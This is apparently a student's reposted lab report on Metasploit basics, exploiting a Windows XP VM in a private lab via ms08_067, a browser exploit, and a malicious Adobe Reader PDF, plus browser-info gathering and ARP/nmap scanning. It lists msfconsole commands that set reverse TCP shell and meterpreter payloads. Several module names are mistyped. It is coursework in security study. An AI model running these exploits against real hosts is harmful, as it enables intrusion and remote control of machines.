20155328 网络攻防 实验五:MSF基础应用

20155328 网络攻防 实验五:MSF基础应用

实践内容及过程记录

一、Windows服务渗透攻击————ms08_067

攻击机:kali

靶机:WindowsXP(英文版)

第一步,分别查看攻击机和靶机的IP。
1065527-20180502230909722-649407773.png

1065527-20180502230927626-978823975.png

在kali终端中,输入msfconsole进入msf控制台,依次输入以下指令:

use exploit/windows/smb/ms08_067_netapiuse exploit/windows/smb/ms08_067_netapi

show payloads

set payload generic/shell_reverse_tcp

set LHOST 192.168.127.138

set LPORT 5328

set RHOST 192.168.127.139

set target 0

exploit

1065527-20180502230949110-1142809993.png

攻击成功,可以看到已经获取了靶机的系统信息:

1065527-20180502231004235-1790327505.png

二、浏览器渗透攻击————ms11_103

在kali终端输入msfconsole打开msf控制台,输入以下参数:

1065527-20180502231114214-210756991.png

被攻击的主机可以看到网页无法正常打开:

1065527-20180502231123548-463473145.png

回到kali,输入以下指令:

sessions
sessions -i n//n为显示的最大进程号

可以看到攻击成功了。
1065527-20180502231133081-835687598.png

三、针对Adobe Reader的渗透攻击

在kali中进入msf控制台,输入以下指令:

use windows/fileformat/adobe)cooltype_sing
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.127.139
set LPORT 5328
set FILENAME 20155328.pdf
exploit

生成了PDF:
1065527-20180502231148309-11463546.png

将生成的PDF拷贝到靶机上。

kali中输入back,进入监听模块,输入以下命令:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.127.139
set LPORT 5328
exploit

1065527-20180502231157923-1075108563.png

然后在靶机上打开PDF:

1065527-20180502231205063-203878955.png

攻击机显示攻击成功:

1065527-20180502231214131-1696861535.png

四、应用Aux辅助模块

1.browser_info

在kali终端中输入show auxiliary,查看aux中都有哪些模块,最后选中gather/browser_info。

进入到msf控制台后,依次输入以下命令:

use auxiliary/gather_browser_info

set SRVHOST 192.168.127.138 //kali的IP

set SRVPORT 5328

exploit

可以看到生成了URL,且Server Start。
1065527-20180502231230226-476479300.png

复制链接,在靶机(WindowsXP)中进行访问:

1065527-20180502231238241-1156553743.png

回到kali,可以看到已经获取了靶机访问该url的浏览器信息。

1065527-20180502231246101-1126844476.png

2.arp_sweep

先在kali终端中输入以下命令,手动创建一个msf所需的数据库:

service postgresql start
msfdb start

再输入msfconsole开启msf,输入命令use auxiliary/scanner/discovery/arp_sweep进入模块,设置参数:(RHOSTS填写kali所在的网段)
1065527-20180502231305433-533457081.png

设定好了以后输入run,可以看到除了自己主机IP外,还有三个其他IP:

1065527-20180502231313294-45097686.png

在msf中输入命令db_nmap -O 192.168.127.139(靶机IP),可以看到开启的端口号即靶机的目标操作系统。
1065527-20180502231320489-1435005936.png

基础问题回答

用自己的话解释什么是exploit,payload,encode。

exploit:利用漏洞或一切可利用的东西进行获取用户权限、篡改文件信息等操作。

payload:在靶机上执行的一段代码,可以反弹连接。

encode:对特征码进行编码,改变特征码。

实践总结与体会

这次实验主要是做的小模块比较多,感觉还。。挺厉害的。。再接再厉吧。

转载于:https://www.cnblogs.com/zyqzyq/p/8983123.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值